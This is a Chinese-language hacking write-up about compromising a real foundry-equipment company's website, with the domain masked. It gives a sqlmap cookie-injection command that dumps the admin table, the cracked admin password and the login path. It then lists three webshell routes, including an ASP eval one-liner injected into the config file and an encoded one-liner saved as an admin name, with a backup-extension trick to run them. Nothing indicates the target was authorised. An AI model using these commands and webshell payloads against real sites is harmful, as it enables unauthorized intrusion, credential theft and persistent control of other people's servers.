[渗透实战]某铸造设备公司官网经典思路

这个网站是微信漏洞挖掘公开课群里的一位群友发出来的，空闲时看了看，不是很难，但是我觉得有一定的参考价值，算是比较经典的一种吧！

*声明：只做技术分享，后续已去除shell的文件！请相关公司做好及时的修复！看到这篇文章的大佬，也别去折腾了，思路本文已经分享，自重

微信群友发来这样的消息：

[图片已删除]

从这样的消息看出来，已经知道 editor 编辑器，可以确定发问者已经进入网站的后台了，所以这样的网站应该比较好拿下。

得知这个问题后，就分享到团队内部，大家有空的就可以看看，练练手。

---

0x01 SQL注入：

当我们访问主站的时候，随便加上参数，发现存在防止SQL注入的程序存在，影响了我们的注入。

当我们浏览器选择移动终端的模拟情况下，访问会跳转到手机的一个域名 m.xxxx.com ，这样的网站就是一个手机域名的，但是是一个和PC公用一个后台的网站程序。

对于子站的防护一般不强，选择了手机网站程序入手，加上' 发现还是会被程序拦截，想到 asp 程序的接受参数用的 request 语句，可以接受 post、get、cookie的参数，因此，我们尝试 cookie注入

这里简单测试发现存在注入，可以写脚本的方式测试，但是为了简单，直接使用 Sqlmap 神器

再来这样一句：

python sqlmap/sqlmap.py -u "http://m.xxxx.com/ProductShow.asp" --cookie "id=325" --batch --dbs --level 2 -T admin -C "id,username,password" --first 1 --dump

得到管理员账号：admin

解密得到管理员密码：admin6830

---

0x02 进入后台：

后台地址：域名/manage/login.asp

进去后浏览器选择 兼容模式

---

0x03 获取Shell：

有三种方式，不详细展示：

1.编辑器其实是 kindeditor ，这个编辑器除了一个XSS漏洞就没什么了，这里选择上传一张带有小马的照片，然后在备份文件中，备份这个文件为 一个 a.asp 的格式备份文件，但会显示备份文件 xxxx/a.asp.asa 成功，其实并没有asa的文件后缀，所以直接连接你的小马就行了。

2.网站配置文件是写配置文件的形式，保存的文件为./Inc/config.asp，保存配置文件的小马推荐一个：

"%><%Y=request("x")%><%eval(Y)%><%'

3.在管理员管理处，添加管理员处，添加编码后的一句话：

┼攠數畣整爠煥敵瑳∨≡┩愾
密码：a

然后备份文件，只需要修改备份后的文件后缀为 asp，也会遇上 asp.asa 的回显，去掉 .asa 即可菜刀连接

---

0x04 总结：

经典的东西，分享之~